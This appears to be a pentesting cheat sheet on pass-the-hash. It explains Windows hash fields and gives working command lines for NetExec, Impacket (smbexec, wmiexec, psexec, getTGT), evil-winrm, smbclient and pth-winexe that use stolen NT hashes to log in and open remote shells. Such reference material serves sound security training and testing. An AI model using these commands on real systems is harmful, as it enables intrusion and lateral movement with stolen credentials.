Pass the Hash
Overview
Having dumped the SAM (local accounts) or LSA (domain accounts), you hold NT hashes for local or domain users. NTLM authentication proves knowledge of the NT hash, not the password, so the hash itself is enough: use nxc to pass it around the network and see whether that credential logs into any other target(s).
Anatomy of a Windows Hash
username:RID:LM_HASH:NT_HASH:::
- The second field is the account's RID (500 is the built-in Administrator), not the full SID
- The LM hash is stored for backward compatibility; on current systems LM storage is disabled and the field holds the fixed value aad3b435b51404eeaad3b435b51404ee, which carries no password material
- The NT hash is the key used by NTLM authentication, which is what a client falls back to when it addresses the server by IP address or by a hostname with no registered SPN (no Kerberos service ticket can be requested for it)
- Otherwise, Kerberos is likely going to be used and a plain pass-the-hash will not work; overpass-the-hash (getTGT, below) turns the NT hash into a Kerberos TGT instead
NetExec
nxc smb <target-or-CIDR> -d 'domain.tld' -u "username" -H NT_HASH
Use the hash of a domain user; -d sets the domain so the target's own hostname is not used as the domain name
nxc smb <target-or-CIDR> -u "username" -H NT_HASH --local-auth
Use the hash of a local user account (SAM user, not a domain account); the hash is tried against each host's local SAM, which is how a reused local Administrator password is found across a subnet. nxc marks hosts where the account is local admin with (Pwn3d!)
Impacket Suite
Kali Linux packages the Impacket example scripts behind wrappers named impacket-<scriptName>; e.g. impacket-getTGT invokes getTGT.py. The original scripts are under /usr/share/doc/python3-impacket/examples/ if you need to read or patch them.
impacket-smbexec
impacket-smbexec -hashes ':NT_HASH' 'domain.tld/username@target'
impacket-smbexec wrapper on Kali Linux; -hashes takes LM_HASH:NT_HASH and the LM half can be left empty, as here
impacket-wmiexec
impacket-wmiexec -hashes LM_HASH:NT_HASH 'domain.tld/username@target' cmd.exe
impacket-wmiexec wrapper on Kali Linux; executes over WMI (DCOM, TCP/135 plus dynamic ports) and fetches output over SMB, so no service is installed on the target
impacket-psexec
impacket-psexec -hashes LM_HASH:NT_HASH 'domain.tld/username@target' cmd.exe
impacket-psexec wrapper on Kali Linux; uploads a service binary to ADMIN$ and creates a service, so it needs local admin and is the noisiest of the three for AV and EDR
impacket-getTGT
Overpass-the-Hash -- use the NT hash as the RC4 Kerberos key to request a TGT from the DC, so the credential still works where NTLM is refused
impacket-getTGT -dc-ip 10.80.80.2 -hashes :NT_HASH_HERE 'ad.lab/john.doe'
getTGT takes domain/username only (no @target); the TGT is written to john.doe.ccache. Point KRB5CCNAME at that file and the Impacket tools and nxc can authenticate with the ticket instead of the hash.
WinRM
- WinRM over HTTP: TCP/5985
- WinRM over HTTPS: TCP/5986
evil-winrm -i <target_ip> -u username -H <hash>
Pass the NT hash over WinRM; by default only members of the local Administrators or Remote Management Users groups are allowed to connect
smbclient
smbclient -U 'AD.LAB/john.doe%NT_HASH' --pw-nt-hash -L //filesrv01.ad.lab
Pass john.doe's NT hash and list the shares on filesrv01
Passing-the-Hash Suite
pth-winexe
pth-winexe -U 'domain.tld/username%LM_HASH:NT_HASH' //target cmd.exe
pth-winexe needs the //target argument before the command; like psexec it installs a service on the target